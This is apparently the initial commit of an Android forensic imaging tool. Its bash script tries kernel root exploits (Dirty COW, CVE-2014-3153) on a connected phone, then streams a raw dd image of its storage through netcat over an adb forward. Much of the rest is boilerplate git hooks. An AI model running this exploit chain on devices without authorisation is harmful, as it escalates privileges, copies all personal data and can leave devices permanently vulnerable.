Imanol-Mikel Barba Sabariego / LELevator · Commits

Commit 1d685ae067448c033e1e250803b49c720e5e0858

Authored by Imanol-Mikel Barba Sabariego
0 parents

Initial import

Inline Side-by-side
Showing 192 changed files with 6794 additions and 0 deletions

Too many changes to show.
Reload with full diff Plain diff Email patch

To preserve performance only 100 of 192 files are displayed.

.gitignore 0 → 100644
  View file @1d685ae
  1 +++ a/.gitignore
  1 +dump
  2 +exploits/CVE-2016-5195/libs
  3 +exploits/CVE-2016-5195/obj
  4 +exploits/CVE-2014-3153/libs
  5 +exploits/CVE-2014-3153/obj
  6 +tools/busybox-android/busybox
  7 +tools/busybox-android/busybox*/
  8 +backup
... ...
.gitmodules 0 → 100644
  View file @1d685ae
  1 +++ a/.gitmodules
  1 +[submodule "tools/linux-kernel-exploitation"]
  2 + path = tools/linux-kernel-exploitation
  3 + url = https://github.com/xairy/linux-kernel-exploitation
  4 +[submodule "tools/kernel-exploits"]
  5 + path = tools/kernel-exploits
  6 + url = https://github.com/xairy/kernel-exploits.git
  7 +[submodule "exploits/android_run_root_shell"]
  8 + path = exploits/android_run_root_shell
  9 + url = https://github.com/android-rooting-tools/android_run_root_shell
  10 +[submodule "exploits/CVE-2014-3153"]
  11 + path = exploits/CVE-2014-3153
  12 + url = https://github.com/timwr/CVE-2014-3153
... ...
LELevator.sh 0 → 100755
  View file @1d685ae
  1 +++ a/LELevator.sh
  1 +#!/bin/bash
  2 +
  3 +DEBUG=0
  4 +
  5 +echo ' _ _____ _ _ '
  6 +echo '| | | ____| | _____ ____ _| |_ ___ _ __ '
  7 +echo '| | | _| | | / _ \ \ / / _` | __/ _ \| `__|'
  8 +echo '| |___| |___| |__| __/\ V / (_| | || (_) | | '
  9 +echo '|_____|_____|_____\___| \_/ \__,_|\__\___/|_| '
  10 +echo ' '
  11 +echo 'Top LEL! '
  12 +echo ' '
  13 +
  14 +sleep 1
  15 +if [[ $DEBUG == 1 ]]; then
  16 + set -x
  17 + trap read debug
  18 +fi
  19 +
  20 +EXPLOITLIST="$(cat exploits/exploit_list | grep -P '^[^#]')"
  21 +DEVICELIST="$(adb devices | tail -n +2 | head -n -1 | sed "s/$'\t'/ /g")"
  22 +TCPPORT="8000"
  23 +
  24 +function show_progress()
  25 +{
  26 + local file="$1"
  27 + local disk="$2"
  28 + local disksize="$3"
  29 + local rewrite="\e[1A"
  30 + local progress=0
  31 + local filesize=0
  32 + local cumspeed=1
  33 + local speedavg=0
  34 + local prev_filesize=0
  35 + local timeleft=0
  36 + local counter=1
  37 +
  38 + (
  39 + while true; do
  40 + filesize=$(stat $file --printf "%s")
  41 + progress=$(($filesize*100/$disksize))
  42 + if [[ $progress -gt 100 ]]; then
  43 + progress=100
  44 + fi
  45 + echo "XXX"
  46 + echo "$progress"
  47 + echo "Disk image ($disk -> $file): $timeleft left @ $(($speedavg/1024)) KiB/s avg"
  48 + echo "XXX"
  49 + sleep 1
  50 + if [[ $progress == 100 ]]; then
  51 + break
  52 + fi
  53 + cumspeed=$(($cumspeed + $filesize - $prev_filesize))
  54 + speedavg=$(($cumspeed / $counter))
  55 + counter=$(($counter + 1))
  56 + timeleft=`date -u -d@$((($disksize - $filesize)/$speedavg)) +"%T"`
  57 + prev_filesize=$filesize
  58 + done
  59 + ) | dialog --title "Copy progress" --gauge "Please wait..." 7 70 0
  60 + clear
  61 +}
  62 +
  63 +function deploy_busybox()
  64 +{
  65 + pushd tools/busybox-android > /dev/null
  66 + if [[ ! -f busybox ]]; then
  67 + echo "Building Busybox..."
  68 + ./build.sh > /dev/null
  69 + fi
  70 + ./deploy.sh $1 > /dev/null
  71 + echo "Busybox deployed!"
  72 + popd > /dev/null
  73 +}
  74 +
  75 +function remove_busybox()
  76 +{
  77 + tools/busybox-android/undeploy.sh $1 > /dev/null
  78 + echo "Busybox removed from device"
  79 +}
  80 +
  81 +function acquire_disk()
  82 +{
  83 + local DISK="$1"
  84 + local DISKNAME=$(basename $DISK)
  85 + local DISKSIZE=$(($(adb -s $2 shell cat /proc/partitions | tr -d $'\xd' | tr -s " " | grep $DISKNAME$ | cut -d' ' -f 4)*1024))
  86 +
  87 + if [[ $DEBUG == 1 ]]; then
  88 + DISK="/system/bin/mksh"
  89 + DISKSIZE=$(adb -s $2 shell /data/local/tmp/stat -c "%s" $DISK | tr -d $'\xd')
  90 + fi
  91 +
  92 + local rootcmd
  93 + echo "Starting copy of $DISKNAME on $2 ($(($DISKSIZE/1024)) KiB)"
  94 + for exploit in $EXPLOITLIST; do
  95 + echo -n "Trying exploit $exploit... "
  96 + eval pre_$exploit $2
  97 + rootcmd=$(eval $exploit $2)
  98 + if [[ $? == 0 ]]; then
  99 + echo "Success!"
  100 + break;
  101 + else
  102 + echo "Failure"
  103 + eval post_$exploit $2
  104 + fi
  105 + done
  106 + if [[ $rootcmd == "" ]]; then
  107 + echo "Couldn't find a working exploit. Aborting copy of $DISKNAME on $2"
  108 + return 1
  109 + fi
  110 +
  111 + pushd dump/$2 > /dev/null
  112 + adb -s $2 forward tcp:$TCPPORT tcp:$TCPPORT
  113 + local start=$(date +%s)
  114 + echo "cd /data/local/tmp;./dd if=$DISK conv=noerror,sync | ./gzip | ./nc -l -p $TCPPORT;exit" | $rootcmd > /dev/null&
  115 + sleep 1
  116 + nc -w 3 localhost $TCPPORT | gunzip | tee $DISKNAME.dd | sha256sum > $DISKNAME.dd.sha256 &
  117 + show_progress $DISKNAME.dd $DISKNAME $DISKSIZE
  118 + local end=$(date +%s)
  119 + sleep 3
  120 + adb -s $2 forward --remove-all
  121 + echo -e "Done.\n\nTime elapsed: $(($end-$start)) seconds\nHASH (SHA-256): $(cat $DISKNAME.dd.sha256 | cut -d' ' -f 1)\n"
  122 + if [[ $(stat --printf="%s" $DISKNAME.dd) == $DISKSIZE ]]; then
  123 + echo "$DISKNAME copied successfully!"
  124 + else
  125 + echo "WARNING: Disk size ($DISKSIZE B) and image size ($(stat --printf="%s" $DISKNAME.dd) B) do NOT match!"
  126 + fi
  127 + popd > /dev/null
  128 +
  129 + eval post_$exploit $2
  130 + return 0
  131 +}
  132 +
  133 +if [[ $DEVICELIST == "" ]]; then
  134 + echo "No devices found! Exiting..."
  135 + exit 1
  136 +fi
  137 +
  138 +unset DEVICELIST
  139 +OLDIFS="$IFS"
  140 +IFS=$'\n'
  141 +for line in $(adb devices -l | tail -n +2 | head -n -1 | sed "s/$'\t'/ /g"); do
  142 + SERIAL=$(echo $line | tr -s " " | cut -d ' ' -f 1)
  143 + DEV=$(echo $line | tr -s " " | cut -d ' ' -f 3)
  144 + DESC=$(echo $line | tr -s " " | cut -d ' ' -f 4-)
  145 + DEVICELIST+=( "$DEV" "$SERIAL $DESC" )
  146 +done
  147 +IFS="$OLDIFS"
  148 +
  149 +SELECTEDDEVICE=$(dialog --stdout --backtitle "LELevator" --title "Select device" --menu "Choose one of the following Android devices" 15 100 8 "${DEVICELIST[@]}")
  150 +clear
  151 +if [[ $SELECTEDDEVICE == "" ]]; then
  152 + echo "No device selected. Exiting..."
  153 + exit 1
  154 +fi
  155 +
  156 +mkdir -p "dump/$SELECTEDDEVICE"
  157 +
  158 +DISKS=$(adb -s $SELECTEDDEVICE shell cat /proc/partitions | grep -oP "mmcblk\d+" | sort -u)
  159 +DISKLIST=""
  160 +for disk in $DISKS; do
  161 + DISKLIST="$DISKLIST/dev/block/$disk $disk off "
  162 +done
  163 +SELECTEDDISKS=`dialog --stdout --backtitle "LELevator" --title "Select disk(s) to copy" --checklist "Choose one or more disks to copy" 15 40 4 $DISKLIST`
  164 +clear
  165 +
  166 +source exploits/*.sh
  167 +deploy_busybox $SELECTEDDEVICE
  168 +for disk in $SELECTEDDISKS; do
  169 + acquire_disk $disk $SELECTEDDEVICE
  170 +done
  171 +remove_busybox $SELECTEDDEVICE
  172 +
  173 +echo "Finished. Have a nice day!"
... ...
README.md 0 → 100644
  View file @1d685ae
  1 +++ a/README.md
  1 +REQUIREMENTS
  2 +=============
  3 +Debian packages:
  4 +* gcc-arm-linux-gnueabi (Busybox)
  5 +* dialog
  6 +* build-essential
  7 +
  8 +Android SDK:
  9 +* adb (on $PATH)
  10 +* NDK bundle (CVE-2016-5195 needs it)
  11 +
  12 +PROCEDURE FOR IMAGING
  13 +======================
  14 +
  15 +1. Airplane mode
  16 +2. Exploit root
  17 +3. adb forward tcp:8000 tcp:8000
  18 +4. (on recipient) nc -w 3 localhost 8000 | gunzip | tee file.dd | sha256sum | tee file.dd.sha256
  19 +5. dd if=/dev/block/mmcblk0 conv=noerror,sync | gzip | nc -l -p 8000
  20 +6. Crack a cold brewski with THE FUCKING LADS
  21 +7. Profit!
  22 +
  23 +PROCEDURE FOR BUSYBOX
  24 +========================
  25 +(on tools/busybox-android folder)
  26 +1. ./build.sh
  27 +2. ./deploy.sh
  28 +
  29 +NOTES
  30 +======
  31 +- Dumped image seems to use MSDOS partition table
  32 +- **WARNING** Exploit CVE-2016-5195 CAN overwrite RO files SOMEHOW, so besides de disk image, a copy of the run-as is also downloaded in case modification was permanent. In most terminals, the file is not overwritten, but it HAS happened and may very well happen, leaving the terminal vulnerable.
  33 +
  34 +EXPLOITS
  35 +==========
  36 +* **[PATCHED]** Dirty Cow (CVE-2016-5195): Exploit persists until reboot. Patched on 1st December 2016 Security Patch Level.
  37 +
  38 +DEVEL TODO's
  39 +==============
  40 +* [CVE-2014-3153] Adapt and try
  41 +* [CVE-2016-5195] dcow doesn't completely overwrite original file bytes sometimes. Requires multiple tries or reboot
  42 +* Logging system
... ...
CVE-2014-3153 @ 87540e7ca9e
  1 +++ a/exploits/CVE-2014-3153
  1 +Subproject commit 87540e7ca9e1e57d234dd9779c484fa0673a9e31
... ...
exploits/CVE-2016-5195/.git-disabled/HEAD 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/HEAD
  1 +ref: refs/heads/master
... ...
exploits/CVE-2016-5195/.git-disabled/config 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/config
  1 +[core]
  2 + repositoryformatversion = 0
  3 + filemode = true
  4 + bare = false
  5 + logallrefupdates = true
  6 +[remote "origin"]
  7 + url = https://github.com/timwr/CVE-2016-5195.git
  8 + fetch = +refs/heads/*:refs/remotes/origin/*
  9 +[branch "master"]
  10 + remote = origin
  11 + merge = refs/heads/master
... ...
exploits/CVE-2016-5195/.git-disabled/description 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/description
  1 +Unnamed repository; edit this file 'description' to name the repository.
... ...
exploits/CVE-2016-5195/.git-disabled/hooks/applypatch-msg.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/hooks/applypatch-msg.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to check the commit log message taken by
  4 +# applypatch from an e-mail message.
  5 +#
  6 +# The hook should exit with non-zero status after issuing an
  7 +# appropriate message if it wants to stop the commit. The hook is
  8 +# allowed to edit the commit message file.
  9 +#
  10 +# To enable this hook, rename this file to "applypatch-msg".
  11 +
  12 +. git-sh-setup
  13 +commitmsg="$(git rev-parse --git-path hooks/commit-msg)"
  14 +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"}
  15 +:
... ...
exploits/CVE-2016-5195/.git-disabled/hooks/commit-msg.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/hooks/commit-msg.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to check the commit log message.
  4 +# Called by "git commit" with one argument, the name of the file
  5 +# that has the commit message. The hook should exit with non-zero
  6 +# status after issuing an appropriate message if it wants to stop the
  7 +# commit. The hook is allowed to edit the commit message file.
  8 +#
  9 +# To enable this hook, rename this file to "commit-msg".
  10 +
  11 +# Uncomment the below to add a Signed-off-by line to the message.
  12 +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg
  13 +# hook is more suited to it.
  14 +#
  15 +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p')
  16 +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1"
  17 +
  18 +# This example catches duplicate Signed-off-by lines.
  19 +
  20 +test "" = "$(grep '^Signed-off-by: ' "$1" |
  21 + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || {
  22 + echo >&2 Duplicate Signed-off-by lines.
  23 + exit 1
  24 +}
... ...
exploits/CVE-2016-5195/.git-disabled/hooks/post-update.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/hooks/post-update.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to prepare a packed repository for use over
  4 +# dumb transports.
  5 +#
  6 +# To enable this hook, rename this file to "post-update".
  7 +
  8 +exec git update-server-info
... ...
exploits/CVE-2016-5195/.git-disabled/hooks/pre-applypatch.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/hooks/pre-applypatch.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to verify what is about to be committed
  4 +# by applypatch from an e-mail message.
  5 +#
  6 +# The hook should exit with non-zero status after issuing an
  7 +# appropriate message if it wants to stop the commit.
  8 +#
  9 +# To enable this hook, rename this file to "pre-applypatch".
  10 +
  11 +. git-sh-setup
  12 +precommit="$(git rev-parse --git-path hooks/pre-commit)"
  13 +test -x "$precommit" && exec "$precommit" ${1+"$@"}
  14 +:
... ...
exploits/CVE-2016-5195/.git-disabled/hooks/pre-commit.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/hooks/pre-commit.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to verify what is about to be committed.
  4 +# Called by "git commit" with no arguments. The hook should
  5 +# exit with non-zero status after issuing an appropriate message if
  6 +# it wants to stop the commit.
  7 +#
  8 +# To enable this hook, rename this file to "pre-commit".
  9 +
  10 +if git rev-parse --verify HEAD >/dev/null 2>&1
  11 +then
  12 + against=HEAD
  13 +else
  14 + # Initial commit: diff against an empty tree object
  15 + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904
  16 +fi
  17 +
  18 +# If you want to allow non-ASCII filenames set this variable to true.
  19 +allownonascii=$(git config --bool hooks.allownonascii)
  20 +
  21 +# Redirect output to stderr.
  22 +exec 1>&2
  23 +
  24 +# Cross platform projects tend to avoid non-ASCII filenames; prevent
  25 +# them from being added to the repository. We exploit the fact that the
  26 +# printable range starts at the space character and ends with tilde.
  27 +if [ "$allownonascii" != "true" ] &&
  28 + # Note that the use of brackets around a tr range is ok here, (it's
  29 + # even required, for portability to Solaris 10's /usr/bin/tr), since
  30 + # the square bracket bytes happen to fall in the designated range.
  31 + test $(git diff --cached --name-only --diff-filter=A -z $against |
  32 + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0
  33 +then
  34 + cat <<\EOF
  35 +Error: Attempt to add a non-ASCII file name.
  36 +
  37 +This can cause problems if you want to work with people on other platforms.
  38 +
  39 +To be portable it is advisable to rename the file.
  40 +
  41 +If you know what you are doing you can disable this check using:
  42 +
  43 + git config hooks.allownonascii true
  44 +EOF
  45 + exit 1
  46 +fi
  47 +
  48 +# If there are whitespace errors, print the offending file names and fail.
  49 +exec git diff-index --check --cached $against --
... ...
exploits/CVE-2016-5195/.git-disabled/hooks/pre-push.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/hooks/pre-push.sample
  1 +#!/bin/sh
  2 +
  3 +# An example hook script to verify what is about to be pushed. Called by "git
  4 +# push" after it has checked the remote status, but before anything has been
  5 +# pushed. If this script exits with a non-zero status nothing will be pushed.
  6 +#
  7 +# This hook is called with the following parameters:
  8 +#
  9 +# $1 -- Name of the remote to which the push is being done
  10 +# $2 -- URL to which the push is being done
  11 +#
  12 +# If pushing without using a named remote those arguments will be equal.
  13 +#
  14 +# Information about the commits which are being pushed is supplied as lines to
  15 +# the standard input in the form:
  16 +#
  17 +# <local ref> <local sha1> <remote ref> <remote sha1>
  18 +#
  19 +# This sample shows how to prevent push of commits where the log message starts
  20 +# with "WIP" (work in progress).
  21 +
  22 +remote="$1"
  23 +url="$2"
  24 +
  25 +z40=0000000000000000000000000000000000000000
  26 +
  27 +while read local_ref local_sha remote_ref remote_sha
  28 +do
  29 + if [ "$local_sha" = $z40 ]
  30 + then
  31 + # Handle delete
  32 + :
  33 + else
  34 + if [ "$remote_sha" = $z40 ]
  35 + then
  36 + # New branch, examine all commits
  37 + range="$local_sha"
  38 + else
  39 + # Update to existing branch, examine new commits
  40 + range="$remote_sha..$local_sha"
  41 + fi
  42 +
  43 + # Check for WIP commit
  44 + commit=`git rev-list -n 1 --grep '^WIP' "$range"`
  45 + if [ -n "$commit" ]
  46 + then
  47 + echo >&2 "Found WIP commit in $local_ref, not pushing"
  48 + exit 1
  49 + fi
  50 + fi
  51 +done
  52 +
  53 +exit 0
... ...
exploits/CVE-2016-5195/.git-disabled/hooks/pre-rebase.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/hooks/pre-rebase.sample
  1 +#!/bin/sh
  2 +#
  3 +# Copyright (c) 2006, 2008 Junio C Hamano
  4 +#
  5 +# The "pre-rebase" hook is run just before "git rebase" starts doing
  6 +# its job, and can prevent the command from running by exiting with
  7 +# non-zero status.
  8 +#
  9 +# The hook is called with the following parameters:
  10 +#
  11 +# $1 -- the upstream the series was forked from.
  12 +# $2 -- the branch being rebased (or empty when rebasing the current branch).
  13 +#
  14 +# This sample shows how to prevent topic branches that are already
  15 +# merged to 'next' branch from getting rebased, because allowing it
  16 +# would result in rebasing already published history.
  17 +
  18 +publish=next
  19 +basebranch="$1"
  20 +if test "$#" = 2
  21 +then
  22 + topic="refs/heads/$2"
  23 +else
  24 + topic=`git symbolic-ref HEAD` ||
  25 + exit 0 ;# we do not interrupt rebasing detached HEAD
  26 +fi
  27 +
  28 +case "$topic" in
  29 +refs/heads/??/*)
  30 + ;;
  31 +*)
  32 + exit 0 ;# we do not interrupt others.
  33 + ;;
  34 +esac
  35 +
  36 +# Now we are dealing with a topic branch being rebased
  37 +# on top of master. Is it OK to rebase it?
  38 +
  39 +# Does the topic really exist?
  40 +git show-ref -q "$topic" || {
  41 + echo >&2 "No such branch $topic"
  42 + exit 1
  43 +}
  44 +
  45 +# Is topic fully merged to master?
  46 +not_in_master=`git rev-list --pretty=oneline ^master "$topic"`
  47 +if test -z "$not_in_master"
  48 +then
  49 + echo >&2 "$topic is fully merged to master; better remove it."
  50 + exit 1 ;# we could allow it, but there is no point.
  51 +fi
  52 +
  53 +# Is topic ever merged to next? If so you should not be rebasing it.
  54 +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort`
  55 +only_next_2=`git rev-list ^master ${publish} | sort`
  56 +if test "$only_next_1" = "$only_next_2"
  57 +then
  58 + not_in_topic=`git rev-list "^$topic" master`
  59 + if test -z "$not_in_topic"
  60 + then
  61 + echo >&2 "$topic is already up-to-date with master"
  62 + exit 1 ;# we could allow it, but there is no point.
  63 + else
  64 + exit 0
  65 + fi
  66 +else
  67 + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"`
  68 + /usr/bin/perl -e '
  69 + my $topic = $ARGV[0];
  70 + my $msg = "* $topic has commits already merged to public branch:\n";
  71 + my (%not_in_next) = map {
  72 + /^([0-9a-f]+) /;
  73 + ($1 => 1);
  74 + } split(/\n/, $ARGV[1]);
  75 + for my $elem (map {
  76 + /^([0-9a-f]+) (.*)$/;
  77 + [$1 => $2];
  78 + } split(/\n/, $ARGV[2])) {
  79 + if (!exists $not_in_next{$elem->[0]}) {
  80 + if ($msg) {
  81 + print STDERR $msg;
  82 + undef $msg;
  83 + }
  84 + print STDERR " $elem->[1]\n";
  85 + }
  86 + }
  87 + ' "$topic" "$not_in_next" "$not_in_master"
  88 + exit 1
  89 +fi
  90 +
  91 +<<\DOC_END
  92 +
  93 +This sample hook safeguards topic branches that have been
  94 +published from being rewound.
  95 +
  96 +The workflow assumed here is:
  97 +
  98 + * Once a topic branch forks from "master", "master" is never
  99 + merged into it again (either directly or indirectly).
  100 +
  101 + * Once a topic branch is fully cooked and merged into "master",
  102 + it is deleted. If you need to build on top of it to correct
  103 + earlier mistakes, a new topic branch is created by forking at
  104 + the tip of the "master". This is not strictly necessary, but
  105 + it makes it easier to keep your history simple.
  106 +
  107 + * Whenever you need to test or publish your changes to topic
  108 + branches, merge them into "next" branch.
  109 +
  110 +The script, being an example, hardcodes the publish branch name
  111 +to be "next", but it is trivial to make it configurable via
  112 +$GIT_DIR/config mechanism.
  113 +
  114 +With this workflow, you would want to know:
  115 +
  116 +(1) ... if a topic branch has ever been merged to "next". Young
  117 + topic branches can have stupid mistakes you would rather
  118 + clean up before publishing, and things that have not been
  119 + merged into other branches can be easily rebased without
  120 + affecting other people. But once it is published, you would
  121 + not want to rewind it.
  122 +
  123 +(2) ... if a topic branch has been fully merged to "master".
  124 + Then you can delete it. More importantly, you should not
  125 + build on top of it -- other people may already want to
  126 + change things related to the topic as patches against your
  127 + "master", so if you need further changes, it is better to
  128 + fork the topic (perhaps with the same name) afresh from the
  129 + tip of "master".
  130 +
  131 +Let's look at this example:
  132 +
  133 + o---o---o---o---o---o---o---o---o---o "next"
  134 + / / / /
  135 + / a---a---b A / /
  136 + / / / /
  137 + / / c---c---c---c B /
  138 + / / / \ /
  139 + / / / b---b C \ /
  140 + / / / / \ /
  141 + ---o---o---o---o---o---o---o---o---o---o---o "master"
  142 +
  143 +
  144 +A, B and C are topic branches.
  145 +
  146 + * A has one fix since it was merged up to "next".
  147 +
  148 + * B has finished. It has been fully merged up to "master" and "next",
  149 + and is ready to be deleted.
  150 +
  151 + * C has not merged to "next" at all.
  152 +
  153 +We would want to allow C to be rebased, refuse A, and encourage
  154 +B to be deleted.
  155 +
  156 +To compute (1):
  157 +
  158 + git rev-list ^master ^topic next
  159 + git rev-list ^master next
  160 +
  161 + if these match, topic has not merged in next at all.
  162 +
  163 +To compute (2):
  164 +
  165 + git rev-list master..topic
  166 +
  167 + if this is empty, it is fully merged to "master".
  168 +
  169 +DOC_END
... ...
exploits/CVE-2016-5195/.git-disabled/hooks/pre-receive.sample 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/hooks/pre-receive.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to make use of push options.
  4 +# The example simply echoes all push options that start with 'echoback='
  5 +# and rejects all pushes when the "reject" push option is used.
  6 +#
  7 +# To enable this hook, rename this file to "pre-receive".
  8 +
  9 +if test -n "$GIT_PUSH_OPTION_COUNT"
  10 +then
  11 + i=0
  12 + while test "$i" -lt "$GIT_PUSH_OPTION_COUNT"
  13 + do
  14 + eval "value=\$GIT_PUSH_OPTION_$i"
  15 + case "$value" in
  16 + echoback=*)
  17 + echo "echo from the pre-receive-hook: ${value#*=}" >&2
  18 + ;;
  19 + reject)
  20 + exit 1
  21 + esac
  22 + i=$((i + 1))
  23 + done
  24 +fi
... ...
exploits/CVE-2016-5195/.git-disabled/hooks/prepare-commit-msg.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/hooks/prepare-commit-msg.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to prepare the commit log message.
  4 +# Called by "git commit" with the name of the file that has the
  5 +# commit message, followed by the description of the commit
  6 +# message's source. The hook's purpose is to edit the commit
  7 +# message file. If the hook fails with a non-zero status,
  8 +# the commit is aborted.
  9 +#
  10 +# To enable this hook, rename this file to "prepare-commit-msg".
  11 +
  12 +# This hook includes three examples. The first comments out the
  13 +# "Conflicts:" part of a merge commit.
  14 +#
  15 +# The second includes the output of "git diff --name-status -r"
  16 +# into the message, just before the "git status" output. It is
  17 +# commented because it doesn't cope with --amend or with squashed
  18 +# commits.
  19 +#
  20 +# The third example adds a Signed-off-by line to the message, that can
  21 +# still be edited. This is rarely a good idea.
  22 +
  23 +case "$2,$3" in
  24 + merge,)
  25 + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;;
  26 +
  27 +# ,|template,)
  28 +# /usr/bin/perl -i.bak -pe '
  29 +# print "\n" . `git diff --cached --name-status -r`
  30 +# if /^#/ && $first++ == 0' "$1" ;;
  31 +
  32 + *) ;;
  33 +esac
  34 +
  35 +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p')
  36 +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1"
... ...
exploits/CVE-2016-5195/.git-disabled/hooks/update.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/hooks/update.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to block unannotated tags from entering.
  4 +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new
  5 +#
  6 +# To enable this hook, rename this file to "update".
  7 +#
  8 +# Config
  9 +# ------
  10 +# hooks.allowunannotated
  11 +# This boolean sets whether unannotated tags will be allowed into the
  12 +# repository. By default they won't be.
  13 +# hooks.allowdeletetag
  14 +# This boolean sets whether deleting tags will be allowed in the
  15 +# repository. By default they won't be.
  16 +# hooks.allowmodifytag
  17 +# This boolean sets whether a tag may be modified after creation. By default
  18 +# it won't be.
  19 +# hooks.allowdeletebranch
  20 +# This boolean sets whether deleting branches will be allowed in the
  21 +# repository. By default they won't be.
  22 +# hooks.denycreatebranch
  23 +# This boolean sets whether remotely creating branches will be denied
  24 +# in the repository. By default this is allowed.
  25 +#
  26 +
  27 +# --- Command line
  28 +refname="$1"
  29 +oldrev="$2"
  30 +newrev="$3"
  31 +
  32 +# --- Safety check
  33 +if [ -z "$GIT_DIR" ]; then
  34 + echo "Don't run this script from the command line." >&2
  35 + echo " (if you want, you could supply GIT_DIR then run" >&2
  36 + echo " $0 <ref> <oldrev> <newrev>)" >&2
  37 + exit 1
  38 +fi
  39 +
  40 +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then
  41 + echo "usage: $0 <ref> <oldrev> <newrev>" >&2
  42 + exit 1
  43 +fi
  44 +
  45 +# --- Config
  46 +allowunannotated=$(git config --bool hooks.allowunannotated)
  47 +allowdeletebranch=$(git config --bool hooks.allowdeletebranch)
  48 +denycreatebranch=$(git config --bool hooks.denycreatebranch)
  49 +allowdeletetag=$(git config --bool hooks.allowdeletetag)
  50 +allowmodifytag=$(git config --bool hooks.allowmodifytag)
  51 +
  52 +# check for no description
  53 +projectdesc=$(sed -e '1q' "$GIT_DIR/description")
  54 +case "$projectdesc" in
  55 +"Unnamed repository"* | "")
  56 + echo "*** Project description file hasn't been set" >&2
  57 + exit 1
  58 + ;;
  59 +esac
  60 +
  61 +# --- Check types
  62 +# if $newrev is 0000...0000, it's a commit to delete a ref.
  63 +zero="0000000000000000000000000000000000000000"
  64 +if [ "$newrev" = "$zero" ]; then
  65 + newrev_type=delete
  66 +else
  67 + newrev_type=$(git cat-file -t $newrev)
  68 +fi
  69 +
  70 +case "$refname","$newrev_type" in
  71 + refs/tags/*,commit)
  72 + # un-annotated tag
  73 + short_refname=${refname##refs/tags/}
  74 + if [ "$allowunannotated" != "true" ]; then
  75 + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2
  76 + echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2
  77 + exit 1
  78 + fi
  79 + ;;
  80 + refs/tags/*,delete)
  81 + # delete tag
  82 + if [ "$allowdeletetag" != "true" ]; then
  83 + echo "*** Deleting a tag is not allowed in this repository" >&2
  84 + exit 1
  85 + fi
  86 + ;;
  87 + refs/tags/*,tag)
  88 + # annotated tag
  89 + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1
  90 + then
  91 + echo "*** Tag '$refname' already exists." >&2
  92 + echo "*** Modifying a tag is not allowed in this repository." >&2
  93 + exit 1
  94 + fi
  95 + ;;
  96 + refs/heads/*,commit)
  97 + # branch
  98 + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then
  99 + echo "*** Creating a branch is not allowed in this repository" >&2
  100 + exit 1
  101 + fi
  102 + ;;
  103 + refs/heads/*,delete)
  104 + # delete branch
  105 + if [ "$allowdeletebranch" != "true" ]; then
  106 + echo "*** Deleting a branch is not allowed in this repository" >&2
  107 + exit 1
  108 + fi
  109 + ;;
  110 + refs/remotes/*,commit)
  111 + # tracking branch
  112 + ;;
  113 + refs/remotes/*,delete)
  114 + # delete tracking branch
  115 + if [ "$allowdeletebranch" != "true" ]; then
  116 + echo "*** Deleting a tracking branch is not allowed in this repository" >&2
  117 + exit 1
  118 + fi
  119 + ;;
  120 + *)
  121 + # Anything else (is there anything else?)
  122 + echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2
  123 + exit 1
  124 + ;;
  125 +esac
  126 +
  127 +# --- Finished
  128 +exit 0
... ...
exploits/CVE-2016-5195/.git-disabled/index 0 → 100644
View file @1d685ae
No preview for this file type
exploits/CVE-2016-5195/.git-disabled/info/exclude 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/info/exclude
  1 +# git ls-files --others --exclude-from=.git/info/exclude
  2 +# Lines that start with '#' are comments.
  3 +# For a project mostly in C, the following would be a good set of
  4 +# exclude patterns (uncomment them if you want to use them):
  5 +# *.[oa]
  6 +# *~
... ...
exploits/CVE-2016-5195/.git-disabled/logs/HEAD 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/logs/HEAD
